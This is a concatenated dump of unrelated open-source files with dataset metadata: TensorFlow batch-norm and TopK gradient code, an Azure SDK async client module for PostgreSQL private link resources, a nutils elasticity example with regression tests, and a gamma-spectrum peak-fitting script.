pop_var = op.inputs[4]
if data_format == b"NCHW":
x = array_ops.transpose(x, [0, 2, 3, 1])
grad_y = array_ops.transpose(grad_y, [0, 2, 3, 1])
dx, dscale, doffset, _, _ = grad_fun(
grad_y,
x,
scale,
pop_mean,
pop_var,
epsilon=epsilon,
data_format="NHWC",
is_training=is_training)
if data_format == b"NCHW":
dx = array_ops.transpose(dx, [0, 3, 1, 2])
return dx, dscale, doffset, None, None
@ops.RegisterGradient("FusedBatchNorm")
def _FusedBatchNormGrad(op, *grad):
return _BaseFusedBatchNormGrad(op, False, *grad)
@ops.RegisterGradient("FusedBatchNormV2")
def _FusedBatchNormV2Grad(op, *grad):
return _BaseFusedBatchNormGrad(op, True, *grad)
def _BatchNormGrad(grad_y,
x,
scale,
pop_mean,
pop_var,
epsilon,
data_format,
is_training=True):
"""Returns the gradients for the 3 inputs of BatchNorm.
Args:
grad_y: A `Tensor` of 4 dimensions for gradient for y.
x: A `Tensor` of 4 dimensions for x.
scale: A `Tensor` of 1 dimension for scaling.
pop_mean: A `Tensor` of 1 dimension for the population mean. Only used when
is_training=False.
pop_var: A `Tensor` of 1 dimension for the population variance. Only used
when is_training=False.
epsilon: A small float number added to the variance of x.
data_format: The data format for input. Either b"NHWC" or b"NCHW".
is_training: A bool value to indicate the operation is for training
(default) or inference.
Returns:
A tuple (grad_x, grad_scale, grad_offset), where grad_x is the gradient
for x, grad_scale the gradient for scale, and grad_offset the gradient
for offset.
"""
x_dtype = x.dtype.base_dtype
if x_dtype == dtypes.float16:
# float16 math is too imprecise, so we do the batch norm gradient
# computations in float32.
x = math_ops.cast(x, dtypes.float32)
grad_y = math_ops.cast(grad_y, dtypes.float32)
if is_training:
if data_format == b"NHWC":
keepdims = False
reduce_axis = [0, 1, 2]
else:
keepdims = True
reduce_axis = [0, 2, 3]
shape = [1, array_ops.size(scale), 1, 1]
scale = array_ops.reshape(scale, shape)
mean_grad_y = math_ops.reduce_mean(grad_y, reduce_axis, keepdims=keepdims)
mean_x = math_ops.reduce_mean(x, reduce_axis, keepdims=keepdims)
var_x = math_ops.reduce_mean(
math_ops.squared_difference(x, array_ops.stop_gradient(mean_x)),
reduce_axis,
keepdims=keepdims)
grad_y_offset = grad_y - mean_grad_y
x_offset = x - mean_x
mean = math_ops.reduce_mean(
grad_y * x_offset, axis=reduce_axis, keepdims=keepdims)
grad_x = scale * math_ops.rsqrt(var_x + epsilon) * (
grad_y_offset - math_ops.reciprocal(var_x + epsilon) * mean * x_offset)
grad_scale = math_ops.rsqrt(var_x + epsilon) * math_ops.reduce_sum(
grad_y * x_offset, axis=reduce_axis, keepdims=keepdims)
if data_format == b"NCHW":
grad_scale = array_ops.squeeze(grad_scale)
grad_offset = math_ops.reduce_sum(grad_y, axis=reduce_axis)
return math_ops.cast(grad_x, x_dtype), grad_scale, grad_offset
else:
if data_format == b"NHWC":
reduce_axis = [0, 1, 2]
else:
reduce_axis = [0, 2, 3]
shape = [1, array_ops.size(pop_mean), 1, 1]
pop_mean = array_ops.reshape(pop_mean, shape)
pop_var = array_ops.reshape(pop_var, shape)
scale = array_ops.reshape(scale, shape)
grad_offset = math_ops.reduce_sum(grad_y, axis=reduce_axis)
var_rsqrt = math_ops.rsqrt(pop_var + epsilon)
grad_scale = math_ops.reduce_sum(
grad_y * (x - pop_mean) * var_rsqrt, axis=reduce_axis)
grad_x = grad_y * scale * var_rsqrt
return math_ops.cast(grad_x, x_dtype), grad_scale, grad_offset
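# A hypothetical NumPy sketch (not part of TensorFlow) of the inference-mode
# (is_training=False) formulas implemented above, assuming NHWC data. The
# helper name is illustrative only and is never called by library code.
def _batch_norm_freeze_grad_sketch(grad_y, x, scale, pop_mean, pop_var, epsilon):
  import numpy as np
  var_rsqrt = 1.0 / np.sqrt(pop_var + epsilon)
  grad_x = grad_y * scale * var_rsqrt                     # elementwise rescale
  grad_scale = (grad_y * (x - pop_mean) * var_rsqrt).sum(axis=(0, 1, 2))
  grad_offset = grad_y.sum(axis=(0, 1, 2))                # reduce over N, H, W
  return grad_x, grad_scale, grad_offset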
@ops.RegisterGradient("FusedBatchNormGrad")
def _FusedBatchNormGradGrad(op, *grad):
"""Returns the gradients for the 3 inputs of FusedBatchNormGrad.
Args:
op: The FusedBatchNormGradOp for which we need to compute gradients.
*grad: An argument list for tensors of gradients wrt the outputs with
grad[0] as grad_grad_x, grad[1] as grad_grad_scale, grad[2] as
grad_grad_offset.
Returns:
A tuple (grad_grad_y, grad_x, grad_scale, None, None), where grad_grad_y
is the gradient for grad_y, grad_x the gradient for x, grad_scale the
gradient for scale.
"""
data_format = op.get_attr("data_format")
epsilon = op.get_attr("epsilon")
is_training = op.get_attr("is_training")
grad_y = op.inputs[0]
x = op.inputs[1]
scale = op.inputs[2]
pop_mean = op.inputs[3]
pop_var = op.inputs[4]
grad_grad_x = grad[0]
grad_grad_scale = grad[1]
grad_grad_offset = grad[2]
with backprop.GradientTape() as tape:
tape.watch(grad_y)
tape.watch(x)
tape.watch(scale)
grad_x, grad_scale, grad_offset = _BatchNormGrad(
grad_y, x, scale, pop_mean, pop_var, epsilon, data_format, is_training)
grad_initial = [grad_grad_x, grad_grad_scale, grad_grad_offset]
grad_grad_y, grad_x, grad_scale = tape.gradient(
[grad_x, grad_scale, grad_offset], [grad_y, x, scale], grad_initial)
return grad_grad_y, grad_x, grad_scale, None, None
@ops.RegisterGradient("FusedBatchNormGradV2")
def _FusedBatchNormGradGradV2(op, *grad):
return _FusedBatchNormGradGrad(op, *grad)
@ops.RegisterGradient("L2Loss")
def _L2LossGrad(op, grad):
"""Return the gradients for L2Loss.
Args:
op: The L2LossOp for which we need to generate gradients.
grad: Tensor containing a single number.
Returns:
The gradient, which is (x * grad).
"""
return op.inputs[0] * grad
@ops.RegisterGradient("TopK")
@ops.RegisterGradient("TopKV2")
def _TopKGrad(op, grad, _):
"""Return the gradients for TopK.
Args:
op: The TopKOp for which we need to generate gradients.
grad: Tensor. The gradients passed to the TopKOp.
Returns:
A list of two tensors, the first being the gradient w.r.t to the input and
TopK, and the second being the gradient w.r.t. to the indices (all zero).
"""
in_shape = array_ops.shape(op.inputs[0])
ind_shape = array_ops.shape(op.outputs[1])
# int32 is not supported on GPU hence up-casting
ind_lastdim = array_ops.gather(
math_ops.cast(ind_shape, dtypes.int64),
array_ops.size(ind_shape) - 1)
# Flatten indices to 2D.
ind_2d = array_ops.reshape(op.outputs[1], array_ops.stack([-1, ind_lastdim]))
in_lastdim = array_ops.gather(
math_ops.cast(in_shape, dtypes.int64),
array_ops.size(in_shape) - 1)
outerdim = array_ops.shape(ind_2d)[0]
# Compute linear indices (flattened to 1D).
ind = array_ops.reshape(
ind_2d + math_ops.cast(
array_ops.expand_dims(
math_ops.range(0,
math_ops.cast(outerdim, dtypes.int64) * in_lastdim,
in_lastdim), -1), dtypes.int32), [-1])
# Substitute grad to appropriate locations and fill the rest with zeros,
# finally reshaping it to the original input shape.
return [
array_ops.reshape(
array_ops.scatter_nd(
array_ops.expand_dims(ind, -1), array_ops.reshape(grad, [-1]),
[math_ops.reduce_prod(in_shape)]), in_shape),
array_ops.zeros([], dtype=dtypes.int32)
]
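# A hypothetical NumPy sketch (not part of TensorFlow) of the scatter performed
# by _TopKGrad for one small 2-D case, to make the flattened-index bookkeeping
# above concrete. Illustrative only; never called by library code.
def _topk_grad_scatter_sketch():
  import numpy as np
  values_grad = np.array([[1.0, 2.0], [3.0, 4.0]])      # grads w.r.t. top-2 values
  indices = np.array([[3, 0], [1, 2]])                  # top-k indices per row
  in_shape = (2, 4)
  flat = indices + np.arange(in_shape[0])[:, None] * in_shape[-1]
  out = np.zeros(np.prod(in_shape))
  out[flat.reshape(-1)] = values_grad.reshape(-1)
  return out.reshape(in_shape)                          # grad w.r.t. the input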
@ops.RegisterGradient("NthElement")
def _NthElementGrad(op, grad):
"""Return the gradients for NthElement.
Args:
op: The NthElementOp for which we need to generate gradients.
grad: Tensor. The gradients passed to the NthElementOp
Returns:
A list of two tensors, the first being the gradient w.r.t. the input,
the second being the gradient w.r.t. the N (None).
"""
input = op.inputs[0] # pylint: disable=redefined-builtin
output = op.outputs[0]
# Compute the number of elements which equal to output in each reduction
# dimension. If there are multiple elements then the gradient will be
# divided between them.
indicators = math_ops.cast(
math_ops.equal(array_ops.expand_dims(output, -1), input), grad.dtype)
grad = array_ops.expand_dims(grad, -1)
num_selected = array_ops.expand_dims(math_ops.reduce_sum(indicators, -1), -1)
return [math_ops.div(indicators, num_selected) * grad, None]
| apache-2.0 | -4,054,416,086,370,532,000 | 32.772686 | 80 | 0.634361 | false |
Azure/azure-sdk-for-python | sdk/rdbms/azure-mgmt-rdbms/azure/mgmt/rdbms/postgresql/aio/operations/_private_link_resources_operations.py | 1 | 8766 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PrivateLinkResourcesOperations:
"""PrivateLinkResourcesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.rdbms.postgresql.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_server(
self,
resource_group_name: str,
server_name: str,
**kwargs
) -> AsyncIterable["_models.PrivateLinkResourceListResult"]:
"""Gets the private link resources for PostgreSQL server.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param server_name: The name of the server.
:type server_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PrivateLinkResourceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.rdbms.postgresql.models.PrivateLinkResourceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateLinkResourceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_server.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'serverName': self._serialize.url("server_name", server_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PrivateLinkResourceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_server.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DBforPostgreSQL/servers/{serverName}/privateLinkResources'} # type: ignore
async def get(
self,
resource_group_name: str,
server_name: str,
group_name: str,
**kwargs
) -> "_models.PrivateLinkResource":
"""Gets a private link resource for PostgreSQL server.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param server_name: The name of the server.
:type server_name: str
:param group_name: The name of the private link resource.
:type group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateLinkResource, or the result of cls(response)
:rtype: ~azure.mgmt.rdbms.postgresql.models.PrivateLinkResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateLinkResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'serverName': self._serialize.url("server_name", server_name, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PrivateLinkResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DBforPostgreSQL/servers/{serverName}/privateLinkResources/{groupName}'} # type: ignore
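# Hedged usage sketch (comments only; not part of the generated client): per the
# class docstring, these operations are reached through the service client rather
# than instantiated directly. The client and credential names below are
# assumptions about the surrounding packages, not guarantees.
#
#     from azure.identity.aio import DefaultAzureCredential
#     from azure.mgmt.rdbms.postgresql.aio import PostgreSQLManagementClient
#
#     async def show_private_link_resources(subscription_id, group, server):
#         async with PostgreSQLManagementClient(DefaultAzureCredential(), subscription_id) as client:
#             async for resource in client.private_link_resources.list_by_server(group, server):
#                 print(resource.name)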
| mit | -1,868,626,017,380,395,800 | 48.247191 | 202 | 0.647616 | false |
nutils/nutils | examples/platewithhole.py | 1 | 5645 | #! /usr/bin/env python3
#
# In this script we solve the linear plane strain elasticity problem for an
# infinite plate with a circular hole under tension. We do this by placing the
# circle in the origin of a unit square, imposing symmetry conditions on the
# left and bottom, and Dirichlet conditions constraining the displacements to
# the analytical solution to the right and top. The traction-free circle is
# removed by means of the Finite Cell Method (FCM).
import nutils, numpy
# The main function defines the parameter space for the script. Configurable
# parameters are the mesh density (in number of elements along an edge),
# element type (square, triangle, or mixed), type of basis function (std or
# spline, with availability depending on element type), polynomial degree, far
# field traction, number of refinement levels for FCM, the cutout radius and
# Poisson's ratio.
def main(nelems: 'number of elements along edge' = 9,
etype: 'type of elements (square/triangle/mixed)' = 'square',
btype: 'type of basis function (std/spline)' = 'std',
degree: 'polynomial degree' = 2,
traction: "far field traction (relative to Young's modulus)" = .1,
maxrefine: 'maxrefine level for trimming' = 2,
radius: 'cut-out radius' = .5,
poisson: 'poisson ratio' = .3):
domain0, geom = nutils.mesh.unitsquare(nelems, etype)
domain = domain0.trim(nutils.function.norm2(geom) - radius, maxrefine=maxrefine)
ns = nutils.function.Namespace()
ns.x = geom
ns.lmbda = 2 * poisson
ns.mu = 1 - poisson
ns.ubasis = domain.basis(btype, degree=degree).vector(2)
ns.u_i = 'ubasis_ni ?lhs_n'
ns.X_i = 'x_i + u_i'
ns.strain_ij = '(u_i,j + u_j,i) / 2'
ns.stress_ij = 'lmbda strain_kk δ_ij + 2 mu strain_ij'
ns.r2 = 'x_k x_k'
ns.R2 = radius**2 / ns.r2
ns.k = (3-poisson) / (1+poisson) # plane stress parameter
ns.scale = traction * (1+poisson) / 2
ns.uexact_i = 'scale (x_i ((k + 1) (0.5 + R2) + (1 - R2) R2 (x_0^2 - 3 x_1^2) / r2) - 2 δ_i1 x_1 (1 + (k - 1 + R2) R2))'
ns.du_i = 'u_i - uexact_i'
sqr = domain.boundary['left,bottom'].integral('(u_i n_i)^2 d:x' @ ns, degree=degree*2)
sqr += domain.boundary['top,right'].integral('du_k du_k d:x' @ ns, degree=20)
cons = nutils.solver.optimize('lhs', sqr, droptol=1e-15)
res = domain.integral('ubasis_ni,j stress_ij d:x' @ ns, degree=degree*2)
lhs = nutils.solver.solve_linear('lhs', res, constrain=cons)
bezier = domain.sample('bezier', 5)
X, stressxx = bezier.eval(['X_i', 'stress_00'] @ ns, lhs=lhs)
nutils.export.triplot('stressxx.png', X, stressxx, tri=bezier.tri, hull=bezier.hull)
err = domain.integral('<du_k du_k, du_i,j du_i,j>_n d:x' @ ns, degree=max(degree,3)*2).eval(lhs=lhs)**.5
nutils.log.user('errors: L2={:.2e}, H1={:.2e}'.format(*err))
return err, cons, lhs
# If the script is executed (as opposed to imported), :func:`nutils.cli.run`
# calls the main function with arguments provided from the command line. For
# example, to keep with the default arguments simply run :sh:`python3
# platewithhole.py`. To select mixed elements and quadratic basis functions add
# :sh:`python3 platewithhole.py etype=mixed degree=2`.
if __name__ == '__main__':
nutils.cli.run(main)
# Once a simulation is developed and tested, it is good practice to save a few
# strategic return values for regression testing. The :mod:`nutils.testing`
# module, which builds on the standard :mod:`unittest` framework, facilitates
# this by providing :func:`nutils.testing.TestCase.assertAlmostEqual64` for the
# embedding of desired results as compressed base64 data.
class test(nutils.testing.TestCase):
@nutils.testing.requires('matplotlib')
def test_spline(self):
err, cons, lhs = main(nelems=4, etype='square', degree=2, btype='spline')
with self.subTest('l2-error'):
self.assertAlmostEqual(err[0], .00033, places=5)
with self.subTest('h1-error'):
self.assertAlmostEqual(err[1], .00671, places=5)
with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''
eNpjaPC5XybfdX+dIkMDDP7TQ7ANDBFsayME+6nRUeMjxnON04zNjFWNYaL655B0nrNUgrFrzrHeh7Ff
n/sNt8v3/Nk7X66uuXT3wunzOecBJ0syCg==''')
with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''
eNoBjABz/6I2TN92H4rfriEeyuw05zGFLykv/i6UM6EzzjLEMUkxMDGlM58zLzOrMlMyOzKwM7EzfTM1
M/ky5TLFM8QznTNmMzYzJTPLNvjONM4/zi/OGclHzJfOSs45zjDOOSK7z5fPC8+cznzOBd/D3d3RFdAu
z+vO+yGg1bnSvdCoz03Pzdz01azS3dDLz2zPaQdIRw==''')
@nutils.testing.requires('matplotlib')
def test_mixed(self):
err, cons, lhs = main(nelems=4, etype='mixed', degree=2, btype='std')
with self.subTest('l2-error'):
self.assertAlmostEqual(err[0], .00024, places=5)
with self.subTest('h1-error'):
self.assertAlmostEqual(err[1], .00739, places=5)
with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''
eNpjaGCAwx4pGMv/8UYZGFvrgagCkNZnaEgyYGjABw0NGRqOG+JXY23E0DDdCMTaaMzQcNT4iDGIPde4
CUz7G6cD6adGZsaqxvjNgUD9c0BbgTjkHEwk+jE2dTVA+Y3nTsmB2GYPsZv1CqhG6jyItePye8XLd69d
BbGXXZp0EUQ7Xrh7gaHB9/zp8znnAW7uYcc=''')
with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''
eNoNzcsrRGEYB2CxlbKY1CSXhUJxzvf+Co0FmlIWTCExdjaEBSuTSI0FiymRaxgrl9QsBgu2mqFc3vc7
5zCliGmQUaKkZCH+gKcnQaM4gI11rFaG3Gn1aJ6rAPlS0XzTGDG+zWOz/MFVlG1kGAGzx1yAF11YwBo2
oKmDMrFDcRVSLmqkeqXUvTpVmwhjALvYRhCF+KAydCJKQfoim1qpliK0RBEsI4o9xBHDOPz/exAG8uBD
L37oiapQghlp48/L2GUOu2WRp3mIT/iXa7iOW9jLGzzJ1WywhxX3cTvvy7Bc6RerO1VuhaVJ+vWbuOWC
S2VKZnmMkxzls4Ln2yynKrly3encWHHtsjx2rp4Xv3akQl65/1+4E2nn0Hkvdu4S10f2hLVlz1kRXaAb
9J3elWY5l0H5AxDbnCE=''')
| mit | -1,045,651,754,385,288,000 | 49.383929 | 122 | 0.717172 | false |
bearing/dosenet-analysis | D3S_analysis/spectra_fitting_tools.py | 1 | 9343 | import numpy as np
from scipy import optimize
from scipy import asarray as ar,exp
from scipy.integrate import quad
from datetime import timedelta  # required by get_peaks below
import matplotlib.pyplot as plt
verbose = 0
#--------------------------------------------------------------------------#
# Fit Functions
#--------------------------------------------------------------------------#
def lbound(bound,par):
return 1e4*np.sqrt(bound-par) + 1e-3*(bound-par) if (par<bound) else 0
def ubound(bound,par):
return 1e4*np.sqrt(par-bound) + 1e-3*(par-bound) if (par>bound) else 0
def bound(bounds,par):
return lbound(bounds[0],par) + ubound(bounds[1],par)
def fixed(fix,par):
return bound((fix,fix), par)
def gaus(x,a,x0,sigma):
return a*exp(-(x-x0)**2/(2*sigma**2))+lbound(0,a)+lbound(0,sigma)+lbound(0,x0)
def expo(x,a,slope):
return a*exp(x*slope)+lbound(0,a)+ubound(0,slope)
# p = [a1,mean,sigma,a2,shift,slope,const]
def gaus_plus_exp(x,p):
return gaus(x,p[0],p[1],p[2])+expo(x,p[3],p[4])
# p = [a1,mean,sigma,slope,const]
def gaus_plus_line(x,p):
return gaus(x,p[0],p[1],p[2])+p[3]*x+p[4]
def double_gaus_plus_exp(x,p):
return gaus(x,p[0],p[1],p[2])+gaus(x,p[3],p[4],p[5])+expo(x,p[6],p[7])
def double_gaus_plus_line(x,p):
return gaus(x,p[0],p[1],p[2])+gaus(x,p[3],p[4],p[5])+p[6]*x+p[7]
def peak_fitter(x,y,fit_function,pinit):
"""
Peak Finder for peak in specified range
Args:
x: data x values for fitting
y: data y values for fitting
fit_function: fit function
pinit: inital parameters for fit function
Returns:
array of resulting fit parameters and array of fit errors
"""
errfunc = lambda p, x, y: fit_function(x,p) - y
pfit,pcov,infodict,errmsg,success = \
optimize.leastsq(errfunc, pinit, args=(x,y), \
full_output=1, epsfcn=0.0001)
if (len(y) > len(pinit)) and pcov is not None:
s_sq = (errfunc(pfit, x, y)**2).sum()/(len(y)-len(pinit))
pcov = pcov * s_sq
else:
pcov = 0
error = []
for i in range(len(pfit)):
try:
error.append(np.absolute(pcov[i][i])**0.5)
except:
error.append( 0.00 )
pfit_leastsq = pfit
perr_leastsq = np.array(error)
return pfit_leastsq, perr_leastsq
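# Minimal usage sketch for peak_fitter (illustrative only; not called anywhere
# in this module). It fits a synthetic gaussian-plus-exponential spectrum and
# assumes only the numpy/scipy imports already made above.
def _peak_fitter_demo():
    x = ar(range(200, 400))
    true_pars = [120.0, 300.0, 12.0, 80.0, -0.01]   # [amp, mean, sigma, bkg_amp, bkg_slope]
    y = gaus_plus_exp(x, true_pars)
    pinit = [100.0, 310.0, 10.0, 60.0, -0.005]      # rough starting guess
    pars, errs = peak_fitter(x, y, gaus_plus_exp, pinit)
    return pars, errs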
def single_peak_fit(array,lower,upper,sigma,count_offset=1,make_plot=False,save_plot=False,plot_name=''):
"""
Performs single gaussian + exponential background fit
Args:
array: full array of counts (spectra)
lower,upper: bounds on spectra for window to fit inside
count_offset: correction for shift from left edge of spectrum
make_plot: flag for plotting fit result (diagnostic)
Returns:
list of fit parameters+errors
"""
points = ar(range(lower,upper))
count_list = list(array[lower:upper])
counts = ar(list(array[lower:upper]))
nentries = len(points)
mean = lower + (upper - lower)/2.0
max_value = max(count_list)
max_index = count_list.index(max_value)
    if max_index > 20:  # peak maximum sits well inside the window; use it
        mean = lower + max_index
max_counts = counts[0]
min_counts = counts[-1]
if min_counts == 0:
min_counts = 1
slope = (np.log(min_counts)-np.log(max_counts))/(points[-1]-points[0])
pinit = [counts[0],mean,sigma,counts[0]*count_offset,slope]
print('Initial parameters: {}'.format(pinit))
pars,errs = peak_fitter(points,counts,gaus_plus_exp,pinit)
print('Fit parameters: {}'.format(pars))
if make_plot:
fig = plt.figure()
fig.patch.set_facecolor('white')
plt.title('Spectra integrated over a day')
plt.xlabel('channels')
plt.ylabel('counts')
plt.xlim(lower,upper)
plt.ylim(counts[-1]*.1,counts[0]*10)
x = ar(range(0,len(array)))
        plt.plot(x,array,'b:',label='data')
#pars = [ 2.95010675e+01, 1.06815654e+03, 6.94962149e+01, 3.89127957e+03, -4.64346847e-03]
plt.plot(points,gaus_plus_exp(points,pars),'ro:',label='fit')
plt.legend()
plt.yscale('log')
if save_plot:
#'/Users/alihanks/Google Drive/NQUAKE_analysis/D3S/fit_plots/'
fig_file = plot_name+'.pdf'
plt.savefig(fig_file)
plt.close()
if verbose:
par_labels = ['norm','mean','sigma','amp','slope']
for i in range(len(pars)):
            print('{}: {} +/- {}'.format(par_labels[i],pars[i],errs[i]))
return [pars[1],errs[1]],[pars[2],errs[2]],[pars[0],errs[0]]
def double_peak_fit(array,counter,lower,upper,pindex=0,count_offset=1,make_plot=False,plot_name=''):
"""
Performs double gaussian + exponential background fit
Args:
array: full array of counts (spectra)
lower,upper: bounds on spectra for window to fit inside
pindex: indication of which gaussian to get fit results for
count_offset: correction for shift from left edge of spectrum
make_plot: flag for plotting fit result (diagnostic)
Returns:
list of fit parameters+errors
"""
points = ar(range(lower,upper))
counts = ar(list(array[lower:upper]))
nentries = len(points)
mean = lower + (upper - lower)/2.0
slope = (np.log(counts[-1])-np.log(counts[0]))/(points[-1]-points[0])
pinit = [counts[0]/7.0,mean-5.0,3.0,counts[0]/7.0,mean+5.0,3.0, \
counts[0]*count_offset,slope]
pars,errs = peak_fitter(points,counts,double_gaus_plus_exp,pinit)
if verbose:
par_labels = ['norm1','mean1','sigma1','norm2','mean2','sigma2','amp','slope']
for i in range(len(pars)):
print('{}-{}: {} +/- {}'.format(par_labels[i],counter,pars[i],errs[i]))
if make_plot:
fig = plt.figure()
fig.patch.set_facecolor('white')
plt.title('Spectra integrated over a day')
plt.xlabel('channels')
plt.ylabel('counts')
plt.xlim(lower,upper)
plt.ylim(20,1000)
x = ar(range(0,len(array)))
plt.plot(x,array,'b:',label='data')
plt.plot(x,double_gaus_plus_exp(x,pars),'ro:',label='fit')
plt.legend()
plt.yscale('log')
fig_file = '/Users/alihanks/Google Drive/NQUAKE_analysis/D3S/fit_plots/'+plot_name+'_fit_'+str(counter)+'.pdf'
plt.savefig(fig_file)
plt.close()
mean = [pars[1],errs[1]]
sigma = [pars[2],errs[2]]
amp = [pars[0],errs[0]]
if (pindex==1 and pars[4] > pars[1]) or (pindex==0 and pars[4] < pars[1]):
mean = [pars[4],errs[4]]
sigma = [pars[5],errs[5]]
amp = [pars[3],errs[3]]
if errs[1] > errs[4]:
mean[1] = errs[1]
if abs(pars[2]-pars[5])/pars[2] > 0.8:
mean[1] = 150
return mean,sigma,amp
def get_peak_counts(mean,sigma,amp):
count,err = quad(gaus,0,500,args=(amp,mean,sigma))
return count,err
def get_all_peak_counts(means,sigmas,amps):
'''
Calculate the area under a gaussian curve (estimate of counts in that peak)
Arguments:
- list of guassian means
- list of guassian widths
- list of gaussian amplitudes
Returns:
- list of counts from resulting gaussian integrations
'''
counts = []
for i in range(len(means)):
count,err = get_peak_counts(means[i],sigmas[i],amps[i])
counts.append(count)
return counts
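# Aside (illustrative, not used by this module): for a peak that lies well
# inside the [0, 500] integration window, the numerical integral in
# get_peak_counts reduces to the closed-form gaussian area, which gives a
# quick cross-check of the fitted counts.
def _peak_counts_closed_form(amp, sigma):
    return amp * sigma * np.sqrt(2.0 * np.pi)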
def get_gross_counts(array,lower,upper):
counts = sum(array[lower:upper])
return counts
def get_peaks(rows, nhours, tstart, tstop, fit_function, fit_args):
'''
    Applies the supplied peak fit function to all data over some range of time
Arguments:
- full list of csv data input rows
- number of hours to integrate each calculation over
- start/stop times to run over
- peak fitting method
- arguments to be fed to the peak fitting method
Returns:
- lists of means,sigmas,amps from all gaussian fits
- each entry in list includes the value and uncertainty
'''
# print(rows)
datatz = rows[-1][1].tzinfo
date_itr = tstart
times = []
means = []
sigmas = []
amps = []
# break data up into days to speed up range selection
while date_itr < tstop:
next_day = date_itr+timedelta(days=1)
daily_row = [row for row in rows if \
inTimeRange(row[1],date_itr,next_day)]
time_itr = date_itr
date_itr = next_day
while time_itr < date_itr:
time_next = time_itr+timedelta(hours=nhours)
integration = [row for row in rows if \
inTimeRange(row[1],time_itr,time_next)]
time_itr = time_next
if len(integration)==0:
continue
array_lst = []
for j in integration:
array_lst.append(make_array(j))
integrated = sum(array_lst)
mean,sigma,amp = fit_function(integrated,*fit_args)
means.append(mean)
sigmas.append(sigma)
amps.append(amp)
times.append(integration[int(len(integration)/2)][1])
return times,means,sigmas,amps
| mit | -3,725,644,255,845,759,000 | 32.603704 | 118 | 0.569945 | false |
